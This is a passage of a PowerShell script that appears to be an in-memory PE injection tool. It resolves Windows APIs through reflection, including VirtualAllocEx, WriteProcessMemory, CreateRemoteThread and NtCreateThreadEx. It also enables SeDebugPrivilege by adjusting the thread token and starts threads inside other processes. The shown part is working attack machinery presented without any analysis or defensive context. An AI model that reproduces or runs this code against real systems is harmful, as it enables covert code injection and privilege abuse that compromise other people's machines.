380.         $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
381.         $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
382.         $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
383.         $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
384.         $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
385.  
386.         return $Win32Types
387.     }
388.  
389.     Function Get-Win32Constants
390.     {
391.         $Win32Constants = New-Object System.Object
392.  
393.         $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
394.         $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
395.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
396.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
397.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
398.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
399.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
400.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
401.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
402.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
403.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
404.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
405.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
406.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
407.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
408.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
409.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
410.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
411.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
412.         $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
413.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
414.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
415.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
416.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
417.         $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
418.         $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
419.         $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
420.         $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
421.         $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
422.  
423.         return $Win32Constants
424.     }
425.  
426.     Function Get-Win32Functions
427.     {
428.         $Win32Functions = New-Object System.Object
429.  
430.         $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
431.         $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
432.         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
433.         $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
434.  
435.         $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
436.         $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
437.         $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
438.         $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx
439.  
440.         $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
441.         $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
442.         $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
443.         $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy
444.  
445.         $memsetAddr = Get-ProcAddress msvcrt.dll memset
446.         $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
447.         $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
448.         $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset
449.  
450.         $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
451.         $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
452.         $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
453.         $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary
454.  
455.         $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
456.         $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
457.         $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
458.         $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress
459.  
460.         $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress
461.         $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
462.         $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate)
463.         $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr
464.  
465.         $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
466.         $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
467.         $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
468.         $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
469.  
470.         $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
471.         $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
472.         $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
473.         $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx
474.  
475.         $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
476.         $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
477.         $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
478.         $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect
479.  
480.         $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
481.         $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
482.         $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
483.         $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
484.  
485.         $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
486.         $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
487.         $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
488.         $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
489.  
490.         $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
491.         $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
492.         $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
493.         $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess
494.  
495.         $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
496.         $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
497.         $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
498.         $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
499.  
500.         $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
501.         $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
502.         $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
503.         $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory
504.  
505.         $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
506.         $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
507.         $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)
508.         $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory
509.  
510.         $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
511.         $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
512.         $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
513.         $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread
514.  
515.         $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
516.         $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])
517.         $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)
518.         $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread
519.  
520.         $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
521.         $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
522.         $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)
523.         $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken
524.  
525.         $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
526.         $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])
527.         $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)
528.         $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread
529.  
530.         $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
531.         $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
532.         $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)
533.         $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges
534.  
535.         $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
536.         $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])
537.         $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)
538.         $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue
539.  
540.         $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
541.         $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])
542.         $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
543.         $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
544.  
545.  
546.         if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
547.             $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
548.             $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
549.             $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
550.             $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
551.         }
552.  
553.         $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
554.         $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
555.         $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
556.         $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process
557.  
558.         $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
559.         $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
560.         $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
561.         $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread
562.  
563.         return $Win32Functions
564.     }
565.  
566.  
567.  
568.  
569.  
570.  
571.  
572.  
573.  
574.     Function Sub-SignedIntAsUnsigned
575.     {
576.         Param(
577.         [Parameter(Position = 0, Mandatory = $true)]
578.         [Int64]
579.         $Value1,
580.  
581.         [Parameter(Position = 1, Mandatory = $true)]
582.         [Int64]
583.         $Value2
584.         )
585.  
586.         [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
587.         [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
588.         [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
589.  
590.         if ($Value1Bytes.Count -eq $Value2Bytes.Count)
591.         {
592.             $CarryOver = 0
593.             for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
594.             {
595.                 $Val = $Value1Bytes[$i] - $CarryOver
596.  
597.                 if ($Val -lt $Value2Bytes[$i])
598.                 {
599.                     $Val += 256
600.                     $CarryOver = 1
601.                 }
602.                 else
603.                 {
604.                     $CarryOver = 0
605.                 }
606.  
607.  
608.                 [UInt16]$Sum = $Val - $Value2Bytes[$i]
609.  
610.                 $FinalBytes[$i] = $Sum -band 0x00FF
611.             }
612.         }
613.         else
614.         {
615.             Throw "Cannot subtract bytearrays of different sizes"
616.         }
617.  
618.         return [BitConverter]::ToInt64($FinalBytes, 0)
619.     }
620.  
621.  
622.     Function Add-SignedIntAsUnsigned
623.     {
624.         Param(
625.         [Parameter(Position = 0, Mandatory = $true)]
626.         [Int64]
627.         $Value1,
628.  
629.         [Parameter(Position = 1, Mandatory = $true)]
630.         [Int64]
631.         $Value2
632.         )
633.  
634.         [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
635.         [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
636.         [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
637.  
638.         if ($Value1Bytes.Count -eq $Value2Bytes.Count)
639.         {
640.             $CarryOver = 0
641.             for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
642.             {
643.  
644.                 [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
645.  
646.                 $FinalBytes[$i] = $Sum -band 0x00FF
647.  
648.                 if (($Sum -band 0xFF00) -eq 0x100)
649.                 {
650.                     $CarryOver = 1
651.                 }
652.                 else
653.                 {
654.                     $CarryOver = 0
655.                 }
656.             }
657.         }
658.         else
659.         {
660.             Throw "Cannot add bytearrays of different sizes"
661.         }
662.  
663.         return [BitConverter]::ToInt64($FinalBytes, 0)
664.     }
665.  
666.  
667.     Function Compare-Val1GreaterThanVal2AsUInt
668.     {
669.         Param(
670.         [Parameter(Position = 0, Mandatory = $true)]
671.         [Int64]
672.         $Value1,
673.  
674.         [Parameter(Position = 1, Mandatory = $true)]
675.         [Int64]
676.         $Value2
677.         )
678.  
679.         [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
680.         [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
681.  
682.         if ($Value1Bytes.Count -eq $Value2Bytes.Count)
683.         {
684.             for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
685.             {
686.                 if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
687.                 {
688.                     return $true
689.                 }
690.                 elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
691.                 {
692.                     return $false
693.                 }
694.             }
695.         }
696.         else
697.         {
698.             Throw "Cannot compare byte arrays of different size"
699.         }
700.  
701.         return $false
702.     }
703.  
704.  
705.     Function Convert-UIntToInt
706.     {
707.         Param(
708.         [Parameter(Position = 0, Mandatory = $true)]
709.         [UInt64]
710.         $Value
711.         )
712.  
713.         [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
714.         return ([BitConverter]::ToInt64($ValueBytes, 0))
715.     }
716.  
717.  
718.     Function Get-Hex
719.     {
720.         Param(
721.         [Parameter(Position = 0, Mandatory = $true)]
722.         $Value
723.         )
724.  
725.         $ValueSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2
726.         $Hex = "0x{0:X$($ValueSize)}" -f [Int64]$Value
727.  
728.         return $Hex
729.     }
730.  
731.  
732.     Function Test-MemoryRangeValid
733.     {
734.         Param(
735.         [Parameter(Position = 0, Mandatory = $true)]
736.         [String]
737.         $DebugString,
738.  
739.         [Parameter(Position = 1, Mandatory = $true)]
740.         [System.Object]
741.         $PEInfo,
742.  
743.         [Parameter(Position = 2, Mandatory = $true)]
744.         [IntPtr]
745.         $StartAddress,
746.  
747.         [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
748.         [IntPtr]
749.         $Size
750.         )
751.  
752.         [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
753.  
754.         $PEEndAddress = $PEInfo.EndAddress
755.  
756.         if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
757.         {
758.             Throw "Trying to write to memory smaller than allocated address range. $DebugString"
759.         }
760.         if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
761.         {
762.             Throw "Trying to write to memory greater than allocated address range. $DebugString"
763.         }
764.     }
765.  
766.  
767.     Function Write-BytesToMemory
768.     {
769.         Param(
770.             [Parameter(Position=0, Mandatory = $true)]
771.             [Byte[]]
772.             $Bytes,
773.  
774.             [Parameter(Position=1, Mandatory = $true)]
775.             [IntPtr]
776.             $MemoryAddress
777.         )
778.  
779.         for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
780.         {
781.             [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
782.         }
783.     }
784.  
785.  
786.  
787.     Function Get-DelegateType
788.     {
789.         Param
790.         (
791.             [OutputType([Type])]
792.  
793.             [Parameter( Position = 0)]
794.             [Type[]]
795.             $Parameters = (New-Object Type[](0)),
796.  
797.             [Parameter( Position = 1 )]
798.             [Type]
799.             $ReturnType = [Void]
800.         )
801.  
802.         $Domain = [AppDomain]::CurrentDomain
803.         $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
804.         $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
805.         $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
806.         $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
807.         $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
808.         $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
809.         $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
810.         $MethodBuilder.SetImplementationFlags('Runtime, Managed')
811.  
812.         Write-Output $TypeBuilder.CreateType()
813.     }
814.  
815.  
816.  
817.     Function Get-ProcAddress
818.     {
819.         Param
820.         (
821.             [OutputType([IntPtr])]
822.  
823.             [Parameter( Position = 0, Mandatory = $True )]
824.             [String]
825.             $Module,
826.  
827.             [Parameter( Position = 1, Mandatory = $True )]
828.             [String]
829.             $Procedure
830.         )
831.  
832.  
833.         $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
834.             Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }
835.         $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
836.  
837.         $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
838.  
839.         Try
840.         {
841.             $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
842.         }
843.         Catch
844.         {
845.             $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress',
846.                                                             [reflection.bindingflags] "Public,Static",
847.                                                             $null,
848.                                                             [System.Reflection.CallingConventions]::Any,
849.                                                             @((New-Object System.Runtime.InteropServices.HandleRef).GetType(),
850.                                                             [string]),
851.                                                             $null)
852.         }
853.  
854.  
855.         $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
856.         $tmpPtr = New-Object IntPtr
857.         $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
858.  
859.  
860.         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
861.     }
862.  
863.  
864.     Function Enable-SeDebugPrivilege
865.     {
866.         Param(
867.         [Parameter(Position = 1, Mandatory = $true)]
868.         [System.Object]
869.         $Win32Functions,
870.  
871.         [Parameter(Position = 2, Mandatory = $true)]
872.         [System.Object]
873.         $Win32Types,
874.  
875.         [Parameter(Position = 3, Mandatory = $true)]
876.         [System.Object]
877.         $Win32Constants
878.         )
879.  
880.         [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
881.         if ($ThreadHandle -eq [IntPtr]::Zero)
882.         {
883.             Throw "Unable to get the handle to the current thread"
884.         }
885.  
886.         [IntPtr]$ThreadToken = [IntPtr]::Zero
887.         [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
888.         if ($Result -eq $false)
889.         {
890.             $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
891.             if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
892.             {
893.                 $Result = $Win32Functions.ImpersonateSelf.Invoke(3)
894.                 if ($Result -eq $false)
895.                 {
896.                     Throw "Unable to impersonate self"
897.                 }
898.  
899.                 $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
900.                 if ($Result -eq $false)
901.                 {
902.                     Throw "Unable to OpenThreadToken."
903.                 }
904.             }
905.             else
906.             {
907.                 Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
908.             }
909.         }
910.  
911.         [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
912.         $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
913.         if ($Result -eq $false)
914.         {
915.             Throw "Unable to call LookupPrivilegeValue"
916.         }
917.  
918.         [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
919.         [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
920.         $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
921.         $TokenPrivileges.PrivilegeCount = 1
922.         $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
923.         $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
924.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)
925.  
926.         $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
927.         $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
928.         if (($Result -eq $false) -or ($ErrorCode -ne 0))
929.         {
930.  
931.         }
932.  
933.         [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
934.     }
935.  
936.  
937.     Function Create-RemoteThread
938.     {
939.         Param(
940.         [Parameter(Position = 1, Mandatory = $true)]
941.         [IntPtr]
942.         $ProcessHandle,
943.  
944.         [Parameter(Position = 2, Mandatory = $true)]
945.         [IntPtr]
946.         $StartAddress,
947.  
948.         [Parameter(Position = 3, Mandatory = $false)]
949.         [IntPtr]
950.         $ArgumentPtr = [IntPtr]::Zero,
951.  
952.         [Parameter(Position = 4, Mandatory = $true)]
953.         [System.Object]
954.         $Win32Functions
955.         )
956.  
957.         [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero
958.  
959.         $OSVersion = [Environment]::OSVersion.Version
960.  
961.         if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
962.         {
963.  
964.             $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
965.             $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
966.             if ($RemoteThreadHandle -eq [IntPtr]::Zero)
967.             {
968.                 Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
969.             }
970.         }
971.  
972.         else
973.         {
974.  
975.             $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
976.         }
977.  
978.         if ($RemoteThreadHandle -eq [IntPtr]::Zero)
979.         {
980.             Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop
981.         }
982.  
983.         return $RemoteThreadHandle
984.     }
985.  
986.  
